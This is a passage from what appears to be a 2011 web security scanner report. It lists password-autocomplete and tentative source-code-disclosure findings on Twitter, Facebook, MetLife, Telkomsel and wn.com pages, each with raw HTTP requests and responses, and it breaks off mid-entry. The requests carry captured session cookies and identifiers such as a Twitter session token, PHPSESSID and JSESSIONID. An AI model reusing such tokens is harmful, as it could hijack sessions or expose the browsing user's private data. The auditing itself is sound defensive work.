X-MID: 120c72dfcfaa860c040931fed485e0a859e93ed5
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToHaWQiJTRiNDI1MTMzMzJhMTg4NTRiNDFhOTdiOTZlMzg5ZTVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg5yZXR1cm5fdG8iGmh0dHA6Ly90d2l0dGVyLmNvbS9lYToP%250AY3JlYXRlZF9hdGwrCK6D6MEwAQ%253D%253D--744fe172172cb84eb458a701d9523215936f73f5; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 49450
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
</h3>
<form action="https://twitter.com/signup" class="signup signup-btn" method="post">
<div class="holding name">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="user[user_password]"/>
<span class="holder">
...[SNIP]...
14.5. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; k=173.193.214.243.1308571866345827; guest_id=13086187569807267; js=1; __utma=43838368.1598605414.1305368954.1308844594.1308913365.9; original_referer=Bm9gjDJKLkMCmTGfXi%2Fo4fSNTngTGWZb0S9qzLzLKytyYNzFWm%2B%2F%2F6n0FbfbkHoIM9Z5WpSyRcI%3D; external_referer=Bm9gjDJKLkMCmTGfXi%2Fo4fSNTngTGWZb0S9qzLzLKytyYNzFWm%2B%2F%2F6n0FbfbkHoIM9Z5WpSyRcI%3D%7C0; _twitter_sess=BAh7CToHaWQiJTRiNDI1MTMzMzJhMTg4NTRiNDFhOTdiOTZlMzg5ZTVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg5yZXR1cm5fdG8iGmh0dHA6Ly90d2l0dGVyLmNvbS9lYToP%250AY3JlYXRlZF9hdGwrCK6D6MEwAQ%253D%253D--744fe172172cb84eb458a701d9523215936f73f5

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308923299-83552-58119
ETag: "38bbda4ac10af72461fef915855f6997"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 13:48:19 GMT
X-Runtime: 0.01017
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 120c72dfcfaa860c040931fed485e0a859e93ed5
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToHaWQiJTRiNDI1MTMzMzJhMTg4NTRiNDFhOTdiOTZlMzg5ZTVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg5yZXR1cm5fdG8iGmh0dHA6Ly90d2l0dGVyLmNvbS9lYToP%250AY3JlYXRlZF9hdGwrCK6D6MEwAQ%253D%253D--744fe172172cb84eb458a701d9523215936f73f5; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 49450
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
<div id="signin-dropdown" class="dropdown dark">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
</span>
<input type="password" value="" name="session[password]" />
</label>
...[SNIP]...
14.6. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; k=173.193.214.243.1308571866345827; guest_id=13086187569807267; js=1; __utma=43838368.1598605414.1305368954.1308844594.1308913365.9; original_referer=Bm9gjDJKLkMCmTGfXi%2Fo4fSNTngTGWZb0S9qzLzLKytyYNzFWm%2B%2F%2F6n0FbfbkHoIM9Z5WpSyRcI%3D; external_referer=Bm9gjDJKLkMCmTGfXi%2Fo4fSNTngTGWZb0S9qzLzLKytyYNzFWm%2B%2F%2F6n0FbfbkHoIM9Z5WpSyRcI%3D%7C0; _twitter_sess=BAh7CToHaWQiJTRiNDI1MTMzMzJhMTg4NTRiNDFhOTdiOTZlMzg5ZTVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg5yZXR1cm5fdG8iGmh0dHA6Ly90d2l0dGVyLmNvbS9lYToP%250AY3JlYXRlZF9hdGwrCK6D6MEwAQ%253D%253D--744fe172172cb84eb458a701d9523215936f73f5

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308923299-83552-58119
ETag: "38bbda4ac10af72461fef915855f6997"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 13:48:19 GMT
X-Runtime: 0.01017
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 120c72dfcfaa860c040931fed485e0a859e93ed5
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToHaWQiJTRiNDI1MTMzMzJhMTg4NTRiNDFhOTdiOTZlMzg5ZTVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg5yZXR1cm5fdG8iGmh0dHA6Ly90d2l0dGVyLmNvbS9lYToP%250AY3JlYXRlZF9hdGwrCK6D6MEwAQ%253D%253D--744fe172172cb84eb458a701d9523215936f73f5; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 49450
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
<div class="front-signin">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="session[password]" title="Password" />
<span class="holder">
...[SNIP]...
14.7. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.addthis.com/bookmark.php?v=250&winname=addthis&pub=asepyanm&source=tbx-250,men-250&lng=en&s=facebook&url=http%3A%2F%2Fbeta.telkom.co.id%2Fproduk-layanan%2F&title=Produk%20dan%20Layanan&ate=AT-asepyanm/-/-/4e048e8a01452adb/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Finfo-perusahaan%2F&tt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Jr-eQ; next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook; next_path=%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; expires=Sun, 23-Jun-2013 13:18:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.140.126
X-Cnection: close
Date: Fri, 24 Jun 2011 13:18:36 GMT
Content-Length: 17051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...
14.8. http://www.metlife.com/system/js/webforms/cta/signinmainjs.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /system/js/webforms/cta/signinmainjs.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /system/js/webforms/cta/signinmainjs.js HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:25 GMT
Server: IBM_HTTP_Server
Last-Modified: Sun, 17 Apr 2011 22:26:23 GMT
Content-Type: application/x-javascript
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:30:25 GMT
Vary: Accept-Encoding
Content-Length: 32444

var envURL = "";
var postURL;
var targetURL;
var newenvURL="";
var newenvURL1="";

function signInSelect(formName) {
   //alert(formName);
   var userSelect = document.getElementById("signinOption
...[SNIP]...
<body onLoad='javascript:document.getElementById(\"loginForm\").submit()'><form id='loginForm' action='" + mlURL + "' method='POST'>";
               mlFormhtml += "<div style='display:none'>
...[SNIP]...
<input type='text' id='USER' name='USER' value='" + esrvUserName + "'/>";
       eservFormhtml += "<input type='password' id='PASSWORD' name='PASSWORD' value='" + esrvPassword + "'/>";
       eservFormhtml += "<input type='hidden' name='SMENC' value='ISO-8859-1'/>
...[SNIP]...
14.9. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.telkomsel.com
Path:   /product/blackberry/550-Paket-BlackBerry-Pilihan.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/blackberry/550-Paket-BlackBerry-Pilihan.html HTTP/1.1
Host: www.telkomsel.com
Proxy-Connection: keep-alive
Referer: http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fafdd737f01cf9ce82c539fcf7eb71a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221308921695%22%3Bs%3A8%3A%22language%22%3Bs%3A2%3A%22ID%22%3B%7D374344fdcb3fa1d5ac3d88c66037bbbb; PHPSESSID=4d70f11bd291a408d8bc49f1e6b3a975; __utmz=80575250.1308921411.1.1.utmcsr=beta.telkom.co.id|utmccn=(referral)|utmcmd=referral|utmcct=/rss/SimplePie/index.php; __utma=80575250.1631938963.1308921411.1308921411.1308921411.1; __utmc=80575250; __utmb=80575250.1.10.1308921411

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:22:40 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 101727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="signin_menu">
<form method="post" id="signin" action="http://www.telkomsel.com/loginmember">
<input id="username" name="username" class="tinput" value="msisdn number" title="username" tabindex="4" type="text" onclick="if(this.value=='msisdn number'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'msisdn number':this.value;" />
<input id="password" name="password" class="tinput" value="password" title="password" tabindex="5" type="password" onclick="if(this.value=='password'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'password':this.value;" />
<p class="remember">
...[SNIP]...
14.10. http://www.telkomsel.com/product/blackberry/undefined  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.telkomsel.com
Path:   /product/blackberry/undefined

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /product/blackberry/undefined HTTP/1.1
Host: www.telkomsel.com
Proxy-Connection: keep-alive
Referer: http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fafdd737f01cf9ce82c539fcf7eb71a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221308921695%22%3Bs%3A8%3A%22language%22%3Bs%3A2%3A%22ID%22%3B%7D374344fdcb3fa1d5ac3d88c66037bbbb; PHPSESSID=4d70f11bd291a408d8bc49f1e6b3a975

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:21:55 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 96122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="signin_menu">
<form method="post" id="signin" action="http://www.telkomsel.com/loginmember">
<input id="username" name="username" class="tinput" value="msisdn number" title="username" tabindex="4" type="text" onclick="if(this.value=='msisdn number'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'msisdn number':this.value;" />
<input id="password" name="password" class="tinput" value="password" title="password" tabindex="5" type="password" onclick="if(this.value=='password'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'password':this.value;" />
<p class="remember">
...[SNIP]...
15. Source code disclosure  previous  next
There are 8 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

15.1. http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://article.wn.com
Path:   /view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/ HTTP/1.1
Host: article.wn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:35 GMT
Server: Apache/2.2.9 (Debian) mod_python/3.3.1 Python/2.5.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 173384

   
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <script type=
...[SNIP]...
<div class="playlistitem" id="<%= id %>"></div>
<a id="<%= id %>" href="#">
<img class="playlist-thumbnail" width="84" height="59" alt="<%= title %>" src="<%= thumbnailUrl %>" />
<div class="video-title"><%= title %></div></a>
<span class="duration"><%= durationStr %></span>
...[SNIP]...
<span class="description-content" style="display:none;"><%= tooltipContentBody %></span>
...[SNIP]...
<a class="playlistitem ellipsis" id="<%= id %>" href="#">
<span class="title"><%= title %></span>
...[SNIP]...
<span class="duration"><%= durationStr %></span>                    
<span class="description-content" style="display:none;"><%= tooltipContentBody %></span>
...[SNIP]...
<a class="playlistitem ellipsis" id="<%= id %>" href="#"><span class="title"><%= title %></span>
...[SNIP]...
<span class="description-content" style="display:none;"><%= tooltipContentBody %></span>' +
'<span class="duration"><%= durationStr %></span>' +
'</li>',
playpositionTemplate: '<%= elapsedTime %> / <%= totalTime %>',
           emptyItemHtml: '<li class="empty">
...[SNIP]...
15.2. http://cdn.wn.com/or/js/underscore-0.6.0.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cdn.wn.com
Path:   /or/js/underscore-0.6.0.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /or/js/underscore-0.6.0.js HTTP/1.1
Host: cdn.wn.com
Proxy-Connection: keep-alive
Referer: http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Content-Type: application/javascript
Date: Fri, 24 Jun 2011 13:27:03 GMT
ETag: "4011494311"
Expires: Fri, 08 Jul 2011 13:27:03 GMT
Last-Modified: Wed, 31 Mar 2010 08:23:28 GMT
Server: ECS (dca/532E)
Via: 1.0 cdnorigin.wn.com (squid/3.1.11)
Warning: 113 cdnorigin.wn.com (squid/3.1.11) This cache hit is still fresh and more than 1 day old
X-Cache: HIT
X-Cache-Lookup: HIT from cdnorigin.wn.com:80
Content-Length: 24583

// Underscore.js
// (c) 2010 Jeremy Ashkenas, DocumentCloud Inc.
// Underscore is freely distributable under the terms of the MIT license.
// Portions of Underscore are inspired by or borrowed from Pr
...[SNIP]...
+ id : id;
};

// By default, Underscore uses ERB-style template delimiters, change the
// following template settings to use alternative delimiters.
_.templateSettings = {
start : '<%',
end : '%>',
interpolate : /<%=(.+?)%>
...[SNIP]...
15.3. http://cdn.wn.com/or/js/videoplayer-20110119-2.min.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cdn.wn.com
Path:   /or/js/videoplayer-20110119-2.min.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /or/js/videoplayer-20110119-2.min.js HTTP/1.1
Host: cdn.wn.com
Proxy-Connection: keep-alive
Referer: http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Content-Type: application/javascript
Date: Fri, 24 Jun 2011 13:27:08 GMT
ETag: "2280383541"
Expires: Fri, 08 Jul 2011 13:27:08 GMT
Last-Modified: Wed, 19 Jan 2011 14:27:13 GMT
Server: ECS (dca/5329)
Via: 1.0 cdnorigin.wn.com (squid/3.1.11)
Warning: 113 cdnorigin.wn.com (squid/3.1.11) This cache hit is still fresh and more than 1 day old
Warning: 110 squid/3.1.11 "Response is stale"
X-Cache: HIT
X-Cache-Lookup: HIT from cdnorigin.wn.com:80
Content-Length: 32897

(function(b,d,e){var a=function(f){var g={playerId:"videoplayerobj",playerContainer:"#playercontainer",flowplayerUrl:"/media/swf/flowplayer-3.1.5.swf",enableLogging:false};d.extend(g,f);this.options=g
...[SNIP]...
<div id="<%= divId %>"><object id="<%= objectId %>">
...[SNIP]...
<a class="playlistitem" id="<%= id %>" href="#"><span class="ellipsis_text"><%= title %></span></a><span class="duration"><%= durationStr %></span>
...[SNIP]...
player-control-prev",controlPlay:".videoplayer-control-play",controlPause:".videoplayer-control-pause",videoThumbnailTooltipOffset:{x:20,y:0},playlistItemTooltipOffset:{x:20,y:0},playpositionTemplate:"<%= elapsedTime %> / <%= totalTime %>",tooltipContentBody:".tooltip-content-body",clipboardTrigger:".tooltip-copy-to-clipboard",clipboardContent:".clipboard-content",emptyItemHtml:'<li class="empty">
...[SNIP]...
<input type="text" class="manual-order" id="ordering_<%= id %>" value="<%= order %>" size="2" /><a href="#" class="manual-order-confirm" id="ordering_<%= id %>_confirm" style="display:none;">
...[SNIP]...
15.4. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-quick-start/prettify.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://download1.parallels.com
Path:   /PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-quick-start/prettify.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-quick-start/prettify.js HTTP/1.1
Host: download1.parallels.com
Proxy-Connection: keep-alive
Referer: http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-quick-start/64277.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=d7aaa062b220f34045ee842b61dd35f8; __utmz=1.1306243398.5.3.utmcsr=webmail.nosedivesailing.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/portal/sidebar.php; __utma=1.1253792871.1305655713.1306182369.1306243398.5; s_vnum=1337191716908%26vn%3D5

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1200
Content-Type: application/x-javascript
Date: Sat, 25 Jun 2011 02:06:19 GMT
ETag: "1188a1b5-99c0-2a44c400"
Expires: Sat, 25 Jun 2011 02:26:19 GMT
Last-Modified: Thu, 27 May 2010 10:50:56 GMT
Server: Apache/2.0.40 (Red Hat Linux)
X-Cache: HIT
Content-Length: 39360

// Copyright (C) 2006 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy
...[SNIP]...
<\?[\s\S]*?(?:\?>|$)/, null],
//Updated by D.Nosov. Remove markup from declarartions. WAS: PR_SOURCE
[PR_SOURCE, /^<%[\s\S]*?(?:%>|$)/, null],
[PR_SOURCE,
// Tags whose content is not escaped, and which contain source code.
/^<(script|style|xmp)\b[^>
...[SNIP]...
15.5. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/prettify.js  previous  next

Summary

